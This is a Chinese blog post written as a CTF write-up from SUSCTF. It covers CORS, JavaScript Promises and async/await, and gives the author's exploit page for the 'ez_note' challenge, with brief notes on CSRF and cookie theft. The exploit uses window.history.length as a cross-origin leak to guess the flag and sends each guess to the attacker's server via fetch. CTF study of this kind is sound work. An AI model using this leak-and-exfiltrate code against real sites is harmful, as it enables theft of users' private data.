前端学习(susctf)
这比赛一万个前端题,比赛这两天算是终于从0开始学javascript了。把涉及到的一些比较重要的点记录一下
CORS
在simple request中,浏览器发出的请求会默认带上origin。服务器通过返回Access-Control-Allow-Origin控制是否能够访问。下面用xmlhttprequest测试一下
如果被挡,浏览器会报错:
Access to XMLHttpRequest at 'http://vpsip/cors.php' from origin 'http://127.0.0.1:23400' has been blocked by CORS policy: The 'Access-Control-Allow-Origin' header has a value 'http://can.allow' that is not equal to the supplied origin.
浏览器中Origin是改不了的。而这几道题都是bot用浏览器访问,所以要利用一些特性绕过这个cors验证。
比如form表单,request headers里不带origin
js异步编程和回调
很多异步函数底层都是用Promise。下面Promise实现每秒钟输出一个数字的功能(当然这里只写了resolve一个回调函数参数和then一个Promise方法)
const myPromise=()=>{ // 定义一个Promise
return new Promise((resolve)=>{
setTimeout(() => {
resolve('1'); // then回调函数的参数
}, 1000);
});
}
myPromise().then((val)=>{
console.log(val);
return '2'; // 下一个then回调函数的参数
}).then((val)=>{
return new Promise(resolve=>{ // 返回一个Promise时,将其给下一个then处理
setTimeout(()=>{
console.log(val);
resolve('3');
},1000);
});
}).then((val)=>{
setTimeout(()=>{
console.log(val);
},1000)
});
Promise解决了回调地狱问题,但是结构还是太复杂,于是有了async/await结构。
const doSomethingAsync = (val) => {
return new Promise(resolve => {
setTimeout(() => resolve(val), 1000)
})
}
const doSomething = async () => {// async函数返回一个Promise
console.log(await doSomethingAsync('1')) // await doSomethingAsync() 返回的是resolve里面的参数
console.log(await doSomethingAsync('2'))
}
console.log('before')
doSomething();
//和下面的效果是等价的
doSomethingAsync('1').then((val)=>{
console.log(val);
return doSomethingAsync('2');
}).then((val)=>{
console.log(val);
});
console.log('after?')
ez_note
具体到ez_note这题,把bot登录并访问url源码的源码简化一下就是
const login=()=>{
return new Promise((resolve)=>{
setTimeout(() => {
console.log('logined');
resolve();
}, 1000);
});
}
const view=()=>{
return new Promise((resolve)=>{
setTimeout(() => {
console.log('viewed');
resolve();
}, 1000);
});
}
const task=async ()=>{
await login();
await view();
console.log('done');
}
task();
可以看到task虽然是异步执行每一个await,实际上还是按顺序执行的,由于search时只有一个结果会有1秒timeout,这里就有了一个非常浪漫的想法:根据回显时间不同爆破出flag。可惜现实的网络环境过于复杂,1s延时很容易被吃掉,这种方法很难行通。
这题是可以用window.history.length判断回显,有个坑点就是window也有cors,要先吧window跳回同源域或者about:blank才能访问history。最后写的exp如下
<!DOCTYPE html>
<head>
<script>
// http://49.232.201.163/sus_note.html
function sleep(ms){
return new Promise((resolve)=>{
setTimeout(() => {
resolve();
}, ms);
})
}
async function guess(done,letter){
let w=window.open(`http://123.60.29.171:10001/search?q=${done}${letter}`);
await sleep(1000);
w.location='/foo.html';
await sleep(200);
len=w.history.length;
w.close();
fetch(`http://vpsip/?flag=${done}${letter}&len=${len}`);
}
async function main(){
dict='qwertyuioplkjhgfdsazxcvbnm1234567890_}'
done='SUSCTF{'
for(let letter of dict){
guess(done,letter);
}
}
</script>
</head>
<body>
<script>
main();
</script>
</body>
但是bot超2s直接断掉,还是得结合手来xd 懒得弄了
CSRF和samesite
这里的same site要求和前面same origin不一样哦,具体移步搜索引擎
samesite在chrome中默认是lax,几种请求类型在cross-site时区别如下
但题目bot应该不是lax而是none,所以我们可以post表单完成csrf
COOKIE劫持
cookie设置了httponly就不能通过js读取cookie,否则直接document.cookie拿当前网站cookie
浙公网安备 33010602011771号